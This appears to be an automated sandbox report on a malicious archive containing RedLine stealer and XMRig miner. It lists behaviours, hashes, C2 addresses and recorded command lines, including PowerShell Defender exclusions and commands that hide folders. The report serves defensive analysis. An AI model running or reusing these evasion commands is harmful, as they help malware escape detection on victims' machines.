Analysis Overview
SHA256
c6897ee5e6e0c63e0cf1866460859894664359d397f9d453546adf12c7794818
Threat Level: Known bad
The file Bird.rar was found to be: Known bad.
Malicious Activity Summary
RedLine Payload
Echelon
RedLine
xmrig
Echelon log file
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner Payload
Executes dropped EXE
Downloads MZ/PE file
Blocklisted process makes network request
Sets file to hidden
Themida packer
Checks BIOS information in registry
Reads user/profile data of web browsers
Drops startup file
Loads dropped DLL
Looks up external IP address via web service
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Detects Pyinstaller
Modifies registry class
Checks processor information in registry
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies system certificate store
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-08-11 12:52
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win7v20210410
Max time kernel
18s
Max time network
55s
Command Line
Signatures
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Bird.exe
"C:\Users\Admin\AppData\Local\Temp\Bird.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 65.21.103.71:56458 | 65.21.103.71 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/1860-60-0x0000000075721000-0x0000000075723000-memory.dmp
memory/1860-62-0x0000000000980000-0x0000000000981000-memory.dmp
memory/1860-64-0x00000000050A0000-0x00000000050A1000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210408
Max time kernel
24s
Max time network
126s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 45.14.49.109:54819 | 45.14.49.109 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
Files
memory/900-118-0x0000000000400000-0x0000000002C86000-memory.dmp
memory/900-117-0x0000000004870000-0x000000000489F000-memory.dmp
memory/900-119-0x0000000004AF0000-0x0000000004B0C000-memory.dmp
memory/900-120-0x00000000073E0000-0x00000000073E1000-memory.dmp
memory/900-121-0x00000000073E2000-0x00000000073E3000-memory.dmp
memory/900-122-0x00000000073E3000-0x00000000073E4000-memory.dmp
memory/900-123-0x00000000073F0000-0x00000000073F1000-memory.dmp
memory/900-124-0x0000000004CE0000-0x0000000004CFA000-memory.dmp
memory/900-125-0x00000000078F0000-0x00000000078F1000-memory.dmp
memory/900-126-0x0000000007270000-0x0000000007271000-memory.dmp
memory/900-127-0x0000000007290000-0x0000000007291000-memory.dmp
memory/900-128-0x00000000072F0000-0x00000000072F1000-memory.dmp
memory/900-129-0x00000000073E4000-0x00000000073E6000-memory.dmp
memory/900-130-0x0000000007FA0000-0x0000000007FA1000-memory.dmp
memory/900-131-0x0000000008C80000-0x0000000008C81000-memory.dmp
memory/900-132-0x0000000008E50000-0x0000000008E51000-memory.dmp
memory/900-133-0x0000000009480000-0x0000000009481000-memory.dmp
memory/900-134-0x00000000099F0000-0x00000000099F1000-memory.dmp
memory/900-135-0x0000000009AB0000-0x0000000009AB1000-memory.dmp
memory/900-136-0x0000000009BB0000-0x0000000009BB1000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win7v20210408
Max time kernel
129s
Max time network
137s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\NSpack\updIns\Sgsmmodul.com | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Sets file to hidden
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1696 set thread context of 744 | N/A | C:\NSpack\updIns\mmscx.exe | C:\NSpack\updIns\mmscx.exe |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\file3.exe
"C:\Users\Admin\AppData\Local\Temp\file3.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\tetracom.vbs" /f=CREATE_NO_WINDOW install.cmd
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\NSpack\updIns\44t.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout 7
C:\NSpack\updIns\Sgsmmodul.com
"Sgsmmodul.com" e -pEktfsdu78s8f87Ap8pHr6Mqaq9SQ mit.rar
C:\Windows\SysWOW64\timeout.exe
timeout 6
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\sevenup.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 8
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\NSpack\updIns\gg4359.bat" "
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\NSpack\updIns"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\NSpack\updIns"
C:\Windows\SysWOW64\timeout.exe
timeout 4
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sandedean.xyz | udp |
| N/A | 212.224.105.82:80 | sandedean.xyz | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.82:80 | sandedean.xyz | tcp |
Files
memory/1820-60-0x0000000076641000-0x0000000076643000-memory.dmp
memory/2032-61-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\tetracom.vbs
| MD5 | bdc0fb5cada9a89f074961224aaf4e63 |
| SHA1 | 9284fe4ecc0fde705fc596dd89191c02915fd7a4 |
| SHA256 | b6156e744da7ffcd5e47e78d487b2ad78b1babf44aaa4145d706247f308106db |
| SHA512 | 83cdf2cdc78106075fe5d8dfaa84fabae7251e76d8b706e74491291a03366bacd94ede79893e62f62f52c13c4cf1e5b5e53ebd49942d3789b01724464ee6ee28 |
C:\NSpack\updIns\44t.bat
| MD5 | 96c69dbc1233bfa7c5e883658e0758d4 |
| SHA1 | 613179fa74db9e71516bdb3a93341e9d90c4ecba |
| SHA256 | deb0fa40647bb04decbdf7e62fd62985bceb5a47ab5f15556763b8db1266acde |
| SHA512 | 43d0621374de43a216086807ac90f3dac4339975cfca251e762c84680bbe4932dfcfee9d08e5c2ff113fa2b4db50e4e8ede960864da34d8905e76851ed91e0d3 |
memory/1928-65-0x0000000000000000-mapping.dmp
memory/1256-67-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\dc.isi
| MD5 | fbd467e1613c53b03376e987f3dbf2da |
| SHA1 | e2ca3ff625122f49e8a382dee32d0ca2f98648bf |
| SHA256 | cca183bc9bb6e35a4713e1e25e80147ff5ab3857984a22ce74b5836f6e98ab68 |
| SHA512 | e2cf3762d688a9d4b43224e86a258751085734af3da3bac93cc3baabb8499b2147c8026dcfc9745fedc5b906116cf1e59f010ad342b43ae242dbc47755fc0e05 |
\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
C:\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
memory/736-72-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
memory/856-75-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\sevenup.vbs
| MD5 | 6a551928353982ab64107a4929c91c91 |
| SHA1 | b68ee5e77a722638f184d0fbf6a4834bb8cc188e |
| SHA256 | 0281bbb85161fdb990c6f1c149a7e4bbaafe262f028e4fb66ffa995e2c4a45f3 |
| SHA512 | 870ef201fafd9d0036dcb4ea912676157075089390c9fecd0ad45d805e38bd74c5dc1fd413e9b765df50249628968ef8684b1b9ea57e2340769553e818c2159d |
memory/1768-78-0x0000000000000000-mapping.dmp
memory/1288-79-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\gg4359.bat
| MD5 | b4be21a8f4bb91b11ccaf08b39b679d5 |
| SHA1 | b3da567bb1072168b54866ee29301bde61bdc45e |
| SHA256 | 35e6fbd496632c91eb924e1d3b7749eeba36125bc4551624786b171bea1d465d |
| SHA512 | a52f7e9ad3ae76abe66920608c8b33a899ace0a4f4600903dc721a822114d5928cd85701a7405ef8ee1dc1aaa295174124a63ccec3e3fd3e347f01dbb2011f3c |
memory/920-83-0x0000000000000000-mapping.dmp
memory/1088-85-0x0000000000000000-mapping.dmp
memory/368-87-0x0000000000000000-mapping.dmp
\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/1696-92-0x0000000000000000-mapping.dmp
\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/744-96-0x0000000000400000-0x0000000000434000-memory.dmp
memory/744-97-0x000000000040CD2F-mapping.dmp
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/1604-99-0x0000000000000000-mapping.dmp
memory/1308-102-0x0000000000000000-mapping.dmp
memory/1028-104-0x0000000000000000-mapping.dmp
memory/952-106-0x0000000000000000-mapping.dmp
memory/744-108-0x0000000000400000-0x0000000000434000-memory.dmp
memory/744-109-0x00000000004B0000-0x00000000004CD000-memory.dmp
memory/744-110-0x0000000004861000-0x0000000004862000-memory.dmp
memory/744-111-0x0000000004862000-0x0000000004863000-memory.dmp
memory/744-112-0x0000000001CC0000-0x0000000001CDB000-memory.dmp
memory/744-113-0x0000000004863000-0x0000000004864000-memory.dmp
memory/744-114-0x0000000004864000-0x0000000004866000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210408
Max time kernel
149s
Max time network
185s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Datafile32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Datafile64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\intobroker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\system32\services32.exe | N/A |
| N/A | N/A | C:\Windows\system32\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Libs\sihost64.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\sihost64.log | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.log | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File opened for modification | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\services64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File opened for modification | C:\Windows\system32\services64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1740 set thread context of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | C:\Windows\System32\cmd.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\intobroker.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\intobroker.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\intobroker.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe
"C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe"
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Users\Admin\AppData\Local\Temp\intobroker.exe
"C:\Users\Admin\AppData\Local\Temp\intobroker.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
